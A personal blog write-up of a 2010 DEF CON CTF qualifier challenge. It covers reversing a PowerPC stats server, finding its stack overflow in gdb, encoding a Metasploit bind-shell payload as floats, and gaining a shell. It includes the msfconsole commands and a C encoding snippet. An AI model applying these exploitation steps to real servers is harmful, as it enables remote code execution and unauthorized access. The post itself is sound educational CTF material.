I’ll take Pwtent Pwnables for 400 please, Alex

May 26, 2010

This past weekend, I participated in my first ever DEF CON Capture the Flag Qualifying Tournament. CTF is a contest at the aforementioned annual hacker conference where the goal is to keep your team’s network services (which are on a closed intranet) up and running for as long as possible, while simultaneously trying to bring down your opponents’ network services. The qualifying tournament is an open tournament to determine the special few who will get to play CTF.

The categories in this year’s quals were Pursuits Trivial, Crypto Badness, Packet Madness, Binary L33tness, Pwtent Pwnables, and Forensics, laid out in a Jeopardy!-style grid. There were 5 challenges in each category, worth 100 through 500 points respectively. I spent a fair amount of time working on Pwtent Pwnables 400 (note that this contest was a team contest), and though I didn’t solve it during the contest, I managed to get a working exploit after the contest ended. Here’s a writeup of my work.

For this problem, you’re given this file and told that it’s running on pwnie.ddtek.biz. Go.

A quick file(1) says that this is a Mach-O executable ppc. strings(1) suggests that it’s binding to a port and listening on a socket. It receives some floating-point numbers, computes the average and standard deviation of those numbers, and sends the results back. The text includes “max of 16”, suggesting an obvious buffer overflow attack.

Let’s take a look at the disassembly and see what we can figure out. Fire up objdump, part of the binutils distribution:

$ objdump -d pp400_8c9d628d2144bbe8b.bin -s > pp400.s

Hmm. Not a lot to work with here. No symbols, and the convoluted dynamic linking makes it extremely difficult to even see what the calls to dynamically linked functions are. Here’s what the stub for calling fork(2) looks like:

    3d80:   7c 08 02 a6     mflr    r0
    3d84:   42 9f 00 05     bcl-    20,4*cr7+so,3d88 
    3d88:   7d 68 02 a6     mflr    r11
    3d8c:   3d 6b 00 00     addis   r11,r11,0
    3d90:   7c 08 03 a6     mtlr    r0
    3d94:   85 8b 03 18     lwzu    r12,792(r11)
    3d98:   7d 89 03 a6     mtctr   r12
    3d9c:   4e 80 04 20     bctr

Can you tell that’s a fork? I sure can’t. The bcl grabs the address of the next instruction (0x3d88), and then after some bookkeeping, the value at address 0x3d88 + 792 = 0x40a0 is loaded and then branched to (the 792 in the lwzu is decimal, i.e. 0x318). The memory at 0x40a0 is in the data segment in a stream of .long 0x2428, which presumably get replaced at load time with the actual addresses of the dynamically linked functions. How exactly that works, though, is still a mystery to me.
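As a sanity check on that address arithmetic, here is a small Python sketch that pulls the fields out of the lwzu word in the stub and computes where it loads from. The helper name decode_dform is made up for this post; the field layout is the usual PowerPC D-form (6-bit opcode, two 5-bit registers, signed 16-bit displacement).

```python
def decode_dform(insn):
    """Split a 32-bit PowerPC D-form instruction word into its fields."""
    opcode = insn >> 26
    rt = (insn >> 21) & 0x1F
    ra = (insn >> 16) & 0x1F
    d = insn & 0xFFFF
    if d & 0x8000:  # the displacement is a signed 16-bit value
        d -= 0x10000
    return opcode, rt, ra, d


# Bytes 85 8b 03 18 from the stub at 0x3d94: lwzu r12,792(r11)
opcode, rt, ra, d = decode_dform(0x858B0318)

# r11 holds the address captured by the bcl/mflr pair (addis adds 0)
r11 = 0x3D88
target = r11 + d

print(opcode, rt, ra, d, hex(target))
```

This prints 33 12 11 792 0x40a0: primary opcode 33 is lwzu, the registers are r12 and r11, and the load address lands on 0x40a0 in the data segment.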

Disassembling it isn’t all that helpful right now, so maybe we can try running it to figure out what it does. I don’t have a PowerPC Mac, but thanks to Rosetta, I can run the program seamlessly on my x86 Mac:

$ chmod a+x pp400_8c9d628d2144bbe8b.bin
$ ./pp400_8c9d628d2144bbe8b.bin
pp400_8c9d628d2144bbe8b.bin: drop_privs failed!
: Operation not permitted

Well drat. It looks like it’s trying to drop privileges (a standard procedure to minimize risk in socket-based applications), but it’s failing somehow. What’s it trying to do? Let’s see with ktrace (aside: DTrace is far superior to ktrace but only available on OS X v10.5 and up; if you’re still running 10.4 like I am, then ktrace is your best option).

$ ktrace ./pp400_8c9d628d2144bbe8b.bin
pp400_8c9d628d2144bbe8b.bin: drop_privs failed!
: Operation not permitted
$ kdump | less

Looking through the log, we see calls to socket(2), setsockopt(2), bind(2), and listen(2), a standard sequence for a simple server. The failure here comes from the calls to setgroups(2) and setgid(2):

  8972 pp400_8c9d628d21 CALL  setgroups(0x1,0xb7fff958)
  8972 pp400_8c9d628d21 RET   setgroups -1 errno 1 Operation not permitted
  8972 pp400_8c9d628d21 CALL  setgid(0x1f8)
  8972 pp400_8c9d628d21 RET   setgid -1 errno 1 Operation not permitted

Well hmph, I’m stumped. The man pages here (and yes I realize I’m mixing links to the Linux and OS X man pages; it doesn’t really matter, they say mostly the same things since this is all POSIX) say that setgroups() will only succeed if run as root, and setgid() can only do trivial things as non-root. I’m definitely not going to run this as root, and the contest server sure as hell won’t be running as root.

At this point, I cheated (sort of). I noticed that this program was doing essentially the same things as an earlier problem in the contest, namely pp100. That problem was a program which also ran a server of sorts, but it was an ELF for FreeBSD. The difference there was that it included some sort of symbols in it, so disassembling it was incredibly helpful: there were useful function names, and it was obvious which system calls were being made and where. And in that program, I noticed that it was grabbing a username (digger) out of the data segment and calling drop_privs_user() with that username.

Armed with that knowledge and taking another look at the data segment of pp400, we see the string “luser” near the beginning. That looks promising. So, create a new user on your Mac named luser and try again.

Nope, same error. Maybe if we try running the program as luser?

$ su luser
$ ./pp400_8c9d628d2144bbe8b.bin

Success! It’s now listening on a socket. But on what port? lsof(8) to the rescue!

$ lsof -i  # Must be run as luser (or as root)
pp400_8c9 9254 luser    4u  IPv4 0x689bc9c      0t0  TCP *:nettest (LISTEN)

It’s listening on the nettest port; if we grep for that in /etc/services, we find that that corresponds to port 4138. So let’s try that out:
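The grep can also be sketched in Python. The function below is a hypothetical helper that scans text in /etc/services format for a service name; the SAMPLE string is a hand-written excerpt in that format, not a copy of any particular system's file.

```python
def find_service_port(services_text, name, proto="tcp"):
    """Return the port for a service name in /etc/services-style text."""
    for line in services_text.splitlines():
        line = line.split("#", 1)[0]  # drop trailing comments
        fields = line.split()
        if len(fields) < 2:
            continue
        port, _, line_proto = fields[1].partition("/")
        names = [fields[0]] + fields[2:]  # canonical name plus aliases
        if name in names and line_proto == proto:
            return int(port)
    return None


# Hand-written sample in /etc/services format (an assumption for the demo)
SAMPLE = """\
# service-name  port/protocol  [aliases]  # comment
nettest         4138/udp     # nettest
nettest         4138/tcp     # nettest
"""

print(find_service_port(SAMPLE, "nettest"))
```

On a real machine you would pass in the contents of /etc/services instead of SAMPLE. Python's standard socket.getservbyname("nettest", "tcp") should do the same lookup, assuming the local services database has the entry.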

$ telnet localhost 4138
Trying ::1...
telnet: connect to address ::1: Connection refused
Connected to localhost.
Escape character is '^]'.
Send me some floats (max of 16), I will tell you some stats!
1 2 3^D
The average of your 3 numbers is 2.000000
The standard deviation of your 3 numbers is 0.816497
Connection closed by foreign host.

It took a bit of experimentation, but I eventually figured out that the server didn’t compute and return results unless you sent a literal ^D character (ASCII 0x04, EOT). Let’s send a gazillion numbers and see what happens:

$ python -c 'print " ".join(map(str, range(10000))), "\4"' | nc localhost 4138
Send me some floats (max of 16), I will tell you some stats!
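For anyone without a Python 2 interpreter handy, here is a rough Python 3 rendering of that one-liner. The function name build_input is mine; the byte layout (space-separated integers, then a space, the 0x04 byte, and a newline) is meant to mirror what the Python 2 print statement emits.

```python
def build_input(count):
    """Space-separated integers 0..count-1, terminated by a literal 0x04."""
    numbers = " ".join(str(n) for n in range(count))
    return (numbers + " \x04\n").encode("ascii")


# Small demo; the crash above used count=10000
print(build_input(3))
```

To feed it to the server, write build_input(10000) to sys.stdout.buffer and pipe the script into nc as before.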

Yep, it crashed all right. Now let’s exploit it. The first step is figuring out where in memory the buffer of floats is being stored. Normally we could just attach a debugger and figure it out, but debugging a process running under Rosetta is not trivial. Fortunately, it is possible: a little googling leads one to this blog post and the Universal Binary Programming Guidelines, which detail the procedure. Run the binary with the OAH_GDB environment variable set, and then in another shell, run gdb --oah, attach to the process, and continue:

# First shell
$ OAH_GDB=YES ./pp400_8c9d628d2144bbe8b.bin
Starting Unix GDB Session

# Second shell (must be luser or root)
$ gdb --oah
(gdb) attach pp400_8c9d628d21.9453
(gdb) c

Unfortunately, it seems that the follow-fork-mode option for GDB does not work on OS X, so if you attempt to set it, you’ll find that you’re still attached to the parent process regardless of its setting. But fortunately, if the child process crashes, gdb still manages to halt when the crash occurs, so we can inspect the program state. Run the earlier Python one-liner to crash the child process:

Program received signal SIGSEGV, Segmentation fault.
0x000033f8 in ?? ()
(gdb) disas $pc-20 $pc+20
Dump of assembler code from 0x33e4 to 0x340c:
0x000033e4:     lfs     f0,128(r30)
0x000033e8:     rlwinm  r2,r0,2,0,29
0x000033ec:     addi    r0,r30,56
0x000033f0:     add     r2,r2,r0
0x000033f4:     addi    r2,r2,8
0x000033f8:     stfs    f0,0(r2)
0x000033fc:     lwz     r2,60(r30)
0x00003400:     addi    r0,r2,1
0x00003404:     stw     r0,60(r30)
0x00003408:     addi    r0,r30,128
End of assembler dump.
(gdb) p/x $r2
$1 = 0xc0000000
(gdb) p/x $sp
$2 = 0xbffff400
(gdb) x/32x $r2-128
0xbfffff80:     0x44340000      0x44344000      0x44348000      0x4434c000
0xbfffff90:     0x44350000      0x44354000      0x44358000      0x4435c000
0xbfffffa0:     0x44360000      0x44364000      0x44368000      0x4436c000
0xbfffffb0:     0x44370000      0x44374000      0x44378000      0x4437c000
0xbfffffc0:     0x44380000      0x44384000      0x44388000      0x4438c000
0xbfffffd0:     0x44390000      0x44394000      0x44398000      0x4439c000
0xbfffffe0:     0x443a0000      0x443a4000      0x443a8000      0x443ac000
0xbffffff0:     0x443b0000      0x443b4000      0x443b8000      0x443bc000

What happened here is we walked off the stack: we just kept copying into the stack buffer all the way up the stack, which started at 0xbffffffc. We can clearly see the increasing set of floating-point numbers filling the end of the stack. Using this handy dandy IEEE 754 calculator, we see that 0x44340000 is the float 720, which means the buffer started at 0xbfffff80 - 720*4 = 0xbffff440, which at this point is $sp+0x40.
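If you don't have an IEEE 754 calculator handy, the same arithmetic can be sketched with Python's struct module. The variable names are mine; the addresses and the word 0x44340000 are taken from the gdb session above.

```python
import struct


def word_to_float(word):
    """Reinterpret a 32-bit big-endian word as an IEEE 754 single."""
    return struct.unpack(">f", struct.pack(">I", word))[0]


first_seen_addr = 0xBFFFFF80   # first address in the x/32x dump
first_seen_word = 0x44340000   # word stored there
stack_pointer = 0xBFFFF400     # $sp at the crash
fault_addr = 0xC0000000        # $r2 at the crash

# The input was 0, 1, 2, ... so the float's value is also its index
index = int(word_to_float(first_seen_word))
buffer_start = first_seen_addr - 4 * index
slots_before_fault = (fault_addr - buffer_start) // 4

print(index, hex(buffer_start), hex(buffer_start - stack_pointer),
      slots_before_fault)
```

This prints 720 0xbffff440 0x40 752, matching the buffer address worked out above and showing roughly how many floats fit before the write runs off the top of the stack.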

To exploit this now, we need to put our payload on the stack and then overwrite a return address with the proper stack address so we jump into the payload. We also can’t write more than about 751 numbers, since we’d crash before we got to the payload as we just did, but fortunately this isn’t a problem.

Now let’s figure out where in the payload the stack address needs to go. Restart the server, reattach gdb, and rerun the Python one-liner with only 100 numbers instead of 10000. The result:

Program received signal SIGSEGV, Segmentation fault.
0x41d00000 in ?? ()

The program counter ended up at 0x41d00000, which is the float 26. So, we need to place our pointer into the payload in the 27th number; the first 26 can be anything.
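The lookup from crashing program counter to input position can be sketched the same way. The helper index_of_pc is hypothetical and assumes the input was the integers 0 through 99, as in the rerun above.

```python
import struct


def float_to_word(value):
    """Return the 32-bit big-endian IEEE 754 single encoding of value."""
    return struct.unpack(">I", struct.pack(">f", value))[0]


def index_of_pc(pc, count=100):
    """Find which of the inputs 0..count-1 ended up in the program counter."""
    for i in range(count):
        if float_to_word(float(i)) == pc:
            return i
    return None


print(index_of_pc(0x41D00000))
```

This prints 26, a zero-based index, which is why the pointer goes in the 27th number.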

For the payload itself, start with the osx/ppc/shell_bind_tcp payload from Metasploit:

$ msfconsole
msf > use osx/ppc/shell_bind_tcp
msf payload(shell_bind_tcp) > generate -t c
 * osx/ppc/shell_bind_tcp - 224 bytes
 * http://www.metasploit.com
 * AutoRunScript=, AppendExit=false, PrependSetresuid=false, 
 * InitialAutoRunScript=, PrependSetuid=false, LPORT=4444, 
 * RHOST=, PrependSetreuid=false
unsigned char buf[] = 

We can’t just send the payload as-is, though. We have to send it as floats which then get sscanf’ed into the raw binary. So we need to take the payload, group it into 4-byte units, convert those to floats, and print those out as strings, being careful that the resulting strings reconvert back properly. PowerPC instructions are fixed at 4 bytes, which is convenient in this case. I did that with this little C snippet:

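#include <stdio.h>

/* Print one 32-bit opcode as a decimal float string, flagging any value
   that does not survive the round trip back through sscanf. */
void emit(unsigned int op)
{
  char buf[256];
  union {
    unsigned int op;
    float f;
  } u;
  float g;

  u.op = op;  /* reinterpret the opcode bits as a float */
  sprintf(buf, "%64.64f", u.f);
  if(sscanf(buf, "%f", &g) != 1 || g != u.f)  /* NaN never compares equal */
    printf("***BAD*** 0x%08x (%s)\n", u.op, buf);
  else
    printf("%s\n", buf);
}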
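The same round-trip check can be sketched in Python for a whole payload at once. This is my own rendering rather than the code used during the contest: payload_to_floats is a made-up name, it assumes the payload is big-endian PowerPC code, and it leans on Python's float parsing instead of the target's sscanf, so treat a passing result as a hint rather than a guarantee.

```python
import struct


def payload_to_floats(payload):
    """Convert raw bytes to (hex word, float string, round-trips?) tuples."""
    if len(payload) % 4:
        raise ValueError("payload length must be a multiple of 4")
    results = []
    for offset in range(0, len(payload), 4):
        raw = payload[offset:offset + 4]
        value = struct.unpack(">f", raw)[0]   # bits reinterpreted as a float
        text = "%.64f" % value                # same precision as the C code
        back = struct.pack(">f", float(text)) # parse and re-encode
        results.append((raw.hex(), text, back == raw))
    return results


# Three words that appear in this post: a nop, mr r3,r30, and addi r3,r30,0
sample = bytes.fromhex("60000000" "7fc3f378" "387e0000")
for word, text, ok in payload_to_floats(sample):
    print(word, "ok" if ok else "***BAD***", text.rstrip("0"))
```

The middle word is flagged because it formats as "nan", which does not parse back to the same bit pattern.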

Trying it out, we see a couple of the opcodes from the payload don’t encode properly: 7fc3f378 (mr r3,r30) and 7fe00008 (trap). Why? Well, these correspond to encodings of NaN. If you try and sscanf back the string “nan”, you’re not going to get those values back.

Time to bust out the Power ISA. Let’s find some instructions we can replace those with that encode properly. We want to avoid any instruction that begins with the bits 011111111 or 111111111. After some perusing through the opcode maps, I found that “addi r3,r30,0”, encoded as 387e0000, would be a suitable replacement for “mr r3,r30”, and “twi 15,r0,0”, encoded as 0de00000, would be a suitable replacement for “trap”. The trap instruction isn’t actually necessary, it’s just a safety in case the system call to exec() to execute the shell fails, but I decided to replace it anyways.
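Both the bit-pattern rule and the replacement encodings can be checked with a few lines of Python. The helper names are mine; the primary opcodes (14 for addi, 3 for twi) and the D-form field layout come from the Power ISA.

```python
def encode_dform(opcode, rt, ra, imm):
    """Assemble a PowerPC D-form word: opcode, two 5-bit fields, 16-bit imm."""
    return (opcode << 26) | (rt << 21) | (ra << 16) | (imm & 0xFFFF)


def exponent_all_ones(word):
    """True when bits 23..30 are all set, i.e. a float NaN or infinity."""
    return ((word >> 23) & 0xFF) == 0xFF


ADDI, TWI = 14, 3  # primary opcodes

candidates = {
    "mr r3,r30": 0x7FC3F378,
    "trap": 0x7FE00008,
    "addi r3,r30,0": encode_dform(ADDI, 3, 30, 0),
    "twi 15,r0,0": encode_dform(TWI, 15, 0, 0),  # rt field holds TO=15
}

for text, word in candidates.items():
    verdict = "unsafe" if exponent_all_ones(word) else "ok"
    print("%-14s 0x%08x %s" % (text, word, verdict))
```

The two original instructions come out as unsafe, and the two replacements come out as 0x387e0000 and 0x0de00000, both ok.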

Throw in a standard nop sled, and we’re done! Here’s the final exploit code. Run as:

$ ./pp400-exploit | nc localhost 4138
Send me some floats (max of 16), I will tell you some stats!
The average of your 148 numbers is inf
The standard deviation of your 148 numbers is inf

# Open up a new shell and connect to the bind shell
$ nc localhost 4444
id
uid=504(luser) gid=504(luser) groups=504(luser)

Huzzah! We have a bind shell!
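For reference, the overall shape of the input (26 filler numbers, the return address in the 27th slot, a nop sled, then the payload) can be sketched as below. This is an illustration of the layout only, not the exploit I ran: the return address 0xbffff500, the sled length of 8, and the placeholder payload of four nops are all made-up values, and the real ones had to be tuned by hand.

```python
import struct

NOP = 0x60000000  # PowerPC "ori r0,r0,0", the conventional nop


def build_words(return_address, sled_length, payload_words, filler_count=26):
    """Lay out filler, return address, nop sled and payload as 32-bit words."""
    words = [0] * filler_count          # the first 26 values can be anything
    words.append(return_address)        # slot 26 overwrites the saved return
    words.extend([NOP] * sled_length)
    words.extend(payload_words)
    return words


def words_to_line(words):
    """Render words as float strings, terminated by the 0x04 byte."""
    floats = [struct.unpack(">f", struct.pack(">I", w))[0] for w in words]
    return " ".join("%.64f" % f for f in floats) + " \x04\n"


# Hypothetical values for illustration only
placeholder_payload = [NOP] * 4
words = build_words(0xBFFFF500, 8, placeholder_payload)
line = words_to_line(words)

print(len(words), hex(words[26]))
```

Stack addresses of the form 0xbffffxxx decode to ordinary negative floats just below -1.99, so the return address itself survives the float conversion.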

Now I mentioned earlier that I didn’t get around to solving this during the contest, so I don’t know if this exploit would have worked against the target machine. I do know, however, that since the PowerPC exploit worked flawlessly on my x86 Mac, it wouldn’t have mattered whether the target machine was actually PPC or x86 (though I did have to tweak the length of the nop sled and the buffer address to jump to until it worked, since the program has different behavior when running under the debugger and when not). Props to Rosetta for correctly translating code generated at runtime.

And that, my friends, is an anatomy of an exploit.

You could have done all that, or you could have realized that this problem was identical to pp400 from last year. I of course didn’t realize this since I didn’t compete last year, but one of my teammates pointed this out to me (yet somehow I lost the motivation to keep working on this problem…). That unofficial writeup to which I just linked was taken down during the contest, presumably because the writers were competing again and didn’t want to give other teams an advantage, though my teammate had a copy of the text. In any case, I still had fun solving this.
